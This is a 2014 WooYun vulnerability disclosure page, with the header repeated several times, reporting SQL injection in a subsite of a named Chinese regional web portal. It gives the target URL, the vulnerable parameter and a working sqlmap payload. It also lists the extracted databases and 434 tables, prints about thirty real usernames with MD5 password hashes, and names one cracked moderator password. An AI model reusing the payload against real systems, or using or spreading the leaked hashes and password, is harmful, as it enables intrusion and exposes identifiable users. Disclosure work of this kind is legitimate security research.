淮安网注射漏洞主站部分数据泄露 | wooyun-2014-019043| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-019043

漏洞标题：淮安网注射漏洞主站部分数据泄露

漏洞作者： if、so

提交时间：2014-06-04 21:12

修复时间：2014-07-23 18:17

公开时间：2014-07-23 18:17

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-06-04：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-07-23：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

淮安网注射漏洞，主站数据泄露，可造成数据被非法获取

详细说明：

作为江苏淮安人，应该对家乡网络安全做出一点贡献，淮安掼蛋可是出名的。
出现注入的是淮安网分站：http://2012fz.huaian.com

Target:http://2012fz.huaian.com/show.php
Place: POST
Parameter: aid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: aid=0' AND (SELECT 2135 FROM(SELECT COUNT(*),CONCAT(0x3a73786d3a,(SELECT (CASE WHEN (2135=2135) THEN 1 ELSE 0 END)),0x3a64666c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WxLW'='WxLW&name=nnyfbetd&sex=%e7%94%b7&Submit2=%e6%8f%90%e4%ba%a4&tel=555-666-0606&address=1
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

获得数据库：

[*] gs_data
[*] house
[*] huaiancom
[*] huaianw
[*] information_schema

很明显huaiancom是淮安网的对应的库。
列出 www.huaian.com的用户表：

Database: huaiancom
[434 tables]
+--------------------------------+
| ku6_members                    |
| ku6_video                      |
| pw_actattachs                  |
| pw_actions                     |
| pw_active                      |
| pw_activity                    |
| pw_activitycate                |
| pw_activitydefaultvalue        |
| pw_activityfield               |
| pw_activitymembers             |
| pw_activitymodel               |
| pw_activitymodel_copy          |
| pw_activitypaylog              |
| pw_activityvalue1              |
| pw_activityvalue10             |
| pw_activityvalue11             |
| pw_activityvalue12             |
| pw_activityvalue13             |
| pw_activityvalue14             |
| pw_activityvalue15             |
| pw_activityvalue16             |
| pw_activityvalue17             |
| pw_activityvalue18             |
| pw_activityvalue19             |
| pw_activityvalue2              |
| pw_activityvalue20             |
| pw_activityvalue21             |
| pw_activityvalue22             |
| pw_activityvalue23             |
| pw_activityvalue24             |
| pw_activityvalue26             |
| pw_activityvalue27             |
| pw_activityvalue28             |
| pw_activityvalue29             |
| pw_activityvalue3              |
| pw_activityvalue31             |
| pw_activityvalue31_copy        |
| pw_activityvalue32             |
| pw_activityvalue32_copy        |
| pw_activityvalue33             |
| pw_activityvalue33_copy        |
| pw_activityvalue35             |
| pw_activityvalue36             |
| pw_activityvalue37             |
| pw_activityvalue4              |
| pw_activityvalue5              |
| pw_activityvalue6              |
| pw_activityvalue7              |
| pw_activityvalue8              |
| pw_activityvalue9              |
| pw_actmember                   |
| pw_actmembers                  |
| pw_administrators              |
| pw_adminlog                    |
| pw_adminset                    |
| pw_advert                      |
| pw_advert_copy                 |
| pw_advert_error                |
| pw_announce                    |
| pw_area_level                  |
| pw_areas                       |
| pw_argument                    |
| pw_attachbuy                   |
| pw_attachdownload              |
| pw_attachs                     |
| pw_attention                   |
| pw_attention_blacklist         |
| pw_auth_certificate            |
| pw_ban                         |
| pw_banuser                     |
| pw_bbsinfo                     |
| pw_block                       |
| pw_buyadvert                   |
| pw_cache                       |
| pw_cache_distribute            |
| pw_cache_members               |
| pw_cachedata                   |
| pw_cdgoods                     |
| pw_cdorder                     |
| pw_cdpay                       |
| pw_channel                     |
| pw_clientorder                 |
| pw_cmembers                    |
| pw_cms_article                 |
| pw_cms_articlecontent          |
| pw_cms_articleextend           |
| pw_cms_attach                  |
| pw_cms_column                  |
| pw_cms_comment                 |
| pw_cms_commentreply            |
| pw_cms_purview                 |
| pw_cnalbum                     |
| pw_cnclass                     |
| pw_cnlevel                     |
| pw_cnphoto                     |
| pw_cnskin                      |
| pw_cnstyles                    |
| pw_collection                  |
| pw_collectiontype              |
| pw_colonys                     |
| pw_comment                     |
| pw_company                     |
| pw_config                      |
| pw_creditlog                   |
| pw_credits                     |
| pw_customfield                 |
| pw_cwritedata                  |
| pw_datanalyse                  |
| pw_datastate                   |
| pw_datastore                   |
| pw_debatedata                  |
| pw_debates                     |
| pw_delta_diarys                |
| pw_delta_members               |
| pw_delta_posts                 |
| pw_delta_threads               |
| pw_diary                       |
| pw_diarytype                   |
| pw_draft                       |
| pw_efone_statistics            |
| pw_efone_statistics_month      |
| pw_elements                    |
| pw_elements_copy               |
| pw_elements_copy1              |
| pw_ext_info_access             |
| pw_ext_info_attach             |
| pw_ext_info_cate               |
| pw_ext_info_field              |
| pw_ext_info_fieldvalue10       |
| pw_ext_info_fieldvalue11       |
| pw_ext_info_fieldvalue12       |
| pw_ext_info_fieldvalue13       |
| pw_ext_info_fieldvalue14       |
| pw_ext_info_fieldvalue15       |
| pw_ext_info_fieldvalue16       |
| pw_ext_info_fieldvalue17       |
| pw_ext_info_fieldvalue18       |
| pw_ext_info_fieldvalue19       |
| pw_ext_info_fieldvalue2        |
| pw_ext_info_fieldvalue20       |
| pw_ext_info_fieldvalue21       |
| pw_ext_info_fieldvalue22       |
| pw_ext_info_fieldvalue24       |
| pw_ext_info_fieldvalue25       |
| pw_ext_info_fieldvalue26       |
| pw_ext_info_fieldvalue27       |
| pw_ext_info_fieldvalue28       |
| pw_ext_info_fieldvalue3        |
| pw_ext_info_fieldvalue30       |
| pw_ext_info_fieldvalue31       |
| pw_ext_info_fieldvalue32       |
| pw_ext_info_fieldvalue33       |
| pw_ext_info_fieldvalue35       |
| pw_ext_info_fieldvalue36       |
| pw_ext_info_fieldvalue37       |
| pw_ext_info_fieldvalue38       |
| pw_ext_info_fieldvalue39       |
| pw_ext_info_fieldvalue4        |
| pw_ext_info_fieldvalue40       |
| pw_ext_info_fieldvalue41       |
| pw_ext_info_fieldvalue42       |
| pw_ext_info_fieldvalue43       |
| pw_ext_info_fieldvalue44       |
| pw_ext_info_fieldvalue45       |
| pw_ext_info_fieldvalue46       |
| pw_ext_info_fieldvalue47       |
| pw_ext_info_fieldvalue48       |
| pw_ext_info_fieldvalue49       |
| pw_ext_info_fieldvalue5        |
| pw_ext_info_fieldvalue50       |
| pw_ext_info_fieldvalue51       |
| pw_ext_info_fieldvalue52       |
| pw_ext_info_fieldvalue53       |
| pw_ext_info_fieldvalue54       |
| pw_ext_info_fieldvalue55       |
| pw_ext_info_fieldvalue6        |
| pw_ext_info_fieldvalue7        |
| pw_ext_info_fieldvalue8        |
| pw_ext_info_fieldvalue9        |
| pw_ext_info_info               |
| pw_ext_info_post               |
| pw_ext_info_report             |
| pw_ext_info_select_search      |
| pw_ext_info_thread             |
| pw_ext_info_tmsg               |
| pw_ext_picvote_item            |
| pw_ext_picvote_log             |
| pw_ext_picvote_post            |
| pw_ext_thread_baseconfig       |
| pw_extragroups                 |
| pw_favors                      |
| pw_feed                        |
| pw_filter                      |
| pw_filter_class                |
| pw_filter_dictionary           |
| pw_filter_record               |
| pw_focus                       |
| pw_forumdata                   |
| pw_forumlog                    |
| pw_forummsg                    |
| pw_forums                      |
| pw_forumsell                   |
| pw_forumsextra                 |
| pw_friends                     |
| pw_friendtype                  |
| pw_group_replay                |
| pw_hack                        |
| pw_help                        |
| pw_hits_threads                |
| pw_house_agency                |
| pw_house_area                  |
| pw_house_broker                |
| pw_house_brokergroup           |
| pw_house_brokerright           |
| pw_house_developer             |
| pw_house_evaluations           |
| pw_house_expired               |
| pw_house_feed                  |
| pw_house_fields                |
| pw_house_groupbuy              |
| pw_house_hireinfo              |
| pw_house_hiremodifytime_index  |
| pw_house_hireoverdue           |
| pw_house_hireposttime_index    |
| pw_house_hireprice_index       |
| pw_house_image                 |
| pw_house_imagedata             |
| pw_house_imagetype             |
| pw_house_info                  |
| pw_house_infoextra             |
| pw_house_map                   |
| pw_house_pagecache             |
| pw_house_personal              |
| pw_house_pricedetail           |
| pw_house_pushdata              |
| pw_house_recommend             |
| pw_house_report                |
| pw_house_saleinfo              |
| pw_house_salemodifytime_index  |
| pw_house_saleoverdue           |
| pw_house_saleposttime_index    |
| pw_house_saleprice_index       |
| pw_house_saleunitprice_index   |
| pw_house_secondimage           |
| pw_house_secondpost            |
| pw_house_userscore             |
| pw_house_video                 |
| pw_house_vrange                |
| pw_invitecode                  |
| pw_inviterecord                |
| pw_invoke                      |
| pw_invokepiece                 |
| pw_ipstates                    |
| pw_job                         |
| pw_jober                       |
| pw_kmd_info                    |
| pw_kmd_paylog                  |
| pw_kmd_spread                  |
| pw_kmd_user                    |
| pw_log_aggregate               |
| pw_log_attachs                 |
| pw_log_colonys                 |
| pw_log_diary                   |
| pw_log_forums                  |
| pw_log_members                 |
| pw_log_postdefend              |
| pw_log_posts                   |
| pw_log_postverify              |
| pw_log_setting                 |
| pw_log_threads                 |
| pw_log_userdefend              |
| pw_log_weibos                  |
| pw_medal_apply                 |
| pw_medal_award                 |
| pw_medal_info                  |
| pw_medal_log                   |
| pw_medalinfo                   |
| pw_medalslogs                  |
| pw_medaluser                   |
| pw_member_behavior_statistic   |
| pw_membercredit                |
| pw_memberdata                  |
| pw_memberinfo                  |
| pw_members                     |
| pw_membertags                  |
| pw_membertags_relations        |
| pw_memo                        |
| pw_modehot                     |
| pw_mpageconfig                 |
| pw_ms_attachs                  |
| pw_ms_configs                  |
| pw_ms_messages                 |
| pw_ms_relations                |
| pw_ms_replies                  |
| pw_ms_searchs                  |
| pw_ms_tasks                    |
| pw_msg                         |
| pw_msgc                        |
| pw_msglog                      |
| pw_nav                         |
| pw_navold                      |
| pw_news                        |
| pw_news_copy                   |
| pw_oboard                      |
| pw_online                      |
| pw_online_guest                |
| pw_online_statistics           |
| pw_online_user                 |
| pw_ouserdata                   |
| pw_overprint                   |
| pw_owritedata                  |
| pw_pagecache                   |
| pw_pageinvoke                  |
| pw_pcfield                     |
| pw_pcmember                    |
| pw_pcvalue1                    |
| pw_permission                  |
| pw_phone_sign                  |
| pw_pidtmp                      |
| pw_pinglog                     |
| pw_plan                        |
| pw_polls                       |
| pw_portalpage                  |
| pw_postcate                    |
| pw_posts                       |
| pw_postsfloor                  |
| pw_poststopped                 |
| pw_privacy                     |
| pw_proclock                    |
| pw_protectedmembers            |
| pw_pushdata                    |
| pw_pushpic                     |
| pw_rate                        |
| pw_rateconfig                  |
| pw_rateresult                  |
| pw_recycle                     |
| pw_replyreward                 |
| pw_replyrewardrecord           |
| pw_report                      |
| pw_reward                      |
| pw_robbuild                    |
| pw_robbuildfloor               |
| pw_schcache                    |
| pw_school                      |
| pw_searchadvert                |
| pw_searchforum                 |
| pw_searchfourm                 |
| pw_searchhotwords              |
| pw_searchstatistic             |
| pw_setform                     |
| pw_sharelinks                  |
| pw_sharelinksrelation          |
| pw_sharelinkstype              |
| pw_shop_adlogs                 |
| pw_shop_ads                    |
| pw_shop_cats                   |
| pw_shop_products               |
| pw_shop_sellers                |
| pw_shop_settings               |
| pw_singleright                 |
| pw_smiles                      |
| pw_space                       |
| pw_sqlcv                       |
| pw_stamp                       |
| pw_statistics_daily            |
| pw_statistics_uniqueidentifier |
| pw_stopic                      |
| pw_stopic_comment              |
| pw_stopic_commentreply         |
| pw_stopicblock                 |
| pw_stopiccategory              |
| pw_stopicpictures              |
| pw_stopicunit                  |
| pw_styles                      |
| pw_tagdata                     |
| pw_tags                        |
| pw_task                        |
| pw_temp_keywords               |
| pw_threads                     |
| pw_threads_at                  |
| pw_threads_img                 |
| pw_tmsgs                       |
| pw_toollog                     |
| pw_tools                       |
| pw_topiccate                   |
| pw_topicfield                  |
| pw_topicmodel                  |
| pw_topictype                   |
| pw_topicvalue1                 |
| pw_topicvalue2                 |
| pw_topicvalue3                 |
| pw_topicvalue4                 |
| pw_topicvalue5                 |
| pw_topicvalue6                 |
| pw_topicvalue7                 |
| pw_topicvalue8                 |
| pw_tpl                         |
| pw_tpltype                     |
| pw_trade                       |
| pw_tradeorder                  |
| pw_ucapp                       |
| pw_ucnotify                    |
| pw_ucsyncredit                 |
| pw_user_career                 |
| pw_user_education              |
| pw_userapp                     |
| pw_userbinding                 |
| pw_usercache                   |
| pw_usergroups                  |
| pw_usertool                    |
| pw_voter                       |
| pw_wappush                     |
| pw_wappushtype                 |
| pw_weibo_bind                  |
| pw_weibo_cmrelations           |
| pw_weibo_cnrelations           |
| pw_weibo_comment               |
| pw_weibo_content               |
| pw_weibo_login_session         |
| pw_weibo_login_user            |
| pw_weibo_referto               |
| pw_weibo_relations             |
| pw_weibo_topicattention        |
| pw_weibo_topicrelations        |
| pw_weibo_topics                |
| pw_windcode                    |
| pw_wordfb                      |
| pw_write_smiles                |
| pw_yun_setting                 |
| tp_liuyan                      |
| tp_params                      |
| tp_toupiao                     |
| tp_type                        |
| tp_userinfo                    |
+--------------------------------+

很明显用的是phpwind的论坛产品。
获得部分数据：

0game, 9886421ac78a8c5fe24d21fc3a22b6c5
[*] 椋炴瘺鑵? 28c79193c9c864f25add867dd4428673
[*] 鑾剚鍓嶈矾鏃犵煡宸? 3cea5f565e8a5652cec646b4278de266
[*] 灞辨按2009, f0c3c7056a20dbde5f0c3c5c0d0fbc9f
[*] CLLJH9698, 5f402a814720ffde966ed9037187c4d6
[*] 娼樻綐椋熺, a25f2ae0e4fd49e51382c4584fa37ddf
[*] 鎺ョ潃蹇芥偁, f4e8ec1716eefa2e82aa5e4c51315f11
[*] 鐜僵鍙綋, be40464f24be6cffd411c988febc95d1
[*] 鐧界懢鐟滅煶, fc45ef777337af12cb04c7c221e2a78e
[*] 澶х溂濡傜伅, d6c75747ad53339c2c288d77195a8aa4
[*] 鎺艰泲鐜嬪晩, d889616a51419e3c86ba519624a13472
[*] 鑺辫嚜椋?姘磋嚜娴? caf13895138087fc58759e8a43564358
[*] kaifanle, db0c2ae699a25c028a3df52924991f34
[*] 蹇靛康棰嗚垶, aeb0ce54a0fa22b62c1c8c390e3b03c4
[*] 鍏粊寰嬪笀, 0df349c6633881c674d0701956a7cd6b
[*] 鍎掗泤鎺煎悰, 48f307f08bbb60ba7fc469f0678c5aa1
[*] 杈撲簡浣犺耽浜嗕笘鐣? f76f12c214a4fff29bd0b47cfb59b41c
[*] bd4vng, 2e9a2f5568250ef5039babe48f864d64
[*] 鏉炬锭鏈? f7226f9805ab7a8e3b3fab6d98aad4c9
[*] 澶ц倸寮ュ嫆, 9ac111e29ed57d3819c2259ecf646c16
[*] 浼樿鐨勭瑧, 4297f44b13955235245b2497399d7a93
[*] 娴庡崡濡瑰, f7dca9503e10f14a968058a62ce15d4c
[*] yangbb007, 53eae5d4e7f7156a28486cebdd6d329b
[*] 娓呴泤鑼夎帀, 25f9e794323b453885f5181f1b624d0b
[*] 鍚洦娈嬪彾, 3158bbac7deda08855b3be7b25cfaec0
[*] 绱鏃犲悕, b7b57c76e264f7bc5a23d1486e0cdf1b
[*] 涓浗浜ら€? ad7aaa5004581969b0c0faec65829e2d
[*] 灏忔笖鍎? 9299fb5a3e8f2907cdaffcfa839c3ca2
[*] fks浜ㄥ埄, 9f08e0e14eb93c9cd05fdcae991d5f35
[*] 濡傛灉閭ｄ箞, 07f73e5daf29820a60269416f715eea9
[*] BG4VOE, d852033b05f655f827ad78d97928d757

中文用户名会乱码
md5破解出CLLJH9698的密码为791226。还是版主！！

，数据实在是多，感觉能有几十万吧。

漏洞证明：

Target:http://2012fz.huaian.com/show.php
Place: POST
Parameter: aid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: aid=0' AND (SELECT 2135 FROM(SELECT COUNT(*),CONCAT(0x3a73786d3a,(SELECT (CASE WHEN (2135=2135) THEN 1 ELSE 0 END)),0x3a64666c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WxLW'='WxLW&name=nnyfbetd&sex=%e7%94%b7&Submit2=%e6%8f%90%e4%ba%a4&tel=555-666-0606&address=1
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

获得数据库：

[*] gs_data
[*] house
[*] huaiancom
[*] huaianw
[*] information_schema

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-019043

漏洞标题：淮安网注射漏洞主站部分数据泄露

相关厂商：淮安网

漏洞作者： if、so

提交时间：2014-06-04 21:12

修复时间：2014-07-23 18:17

公开时间：2014-07-23 18:17

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-019043

漏洞标题：淮安网注射漏洞主站部分数据泄露

相关厂商：淮安网

漏洞作者： if、so

提交时间：2014-06-04 21:12

修复时间：2014-07-23 18:17

公开时间：2014-07-23 18:17

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-019043"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：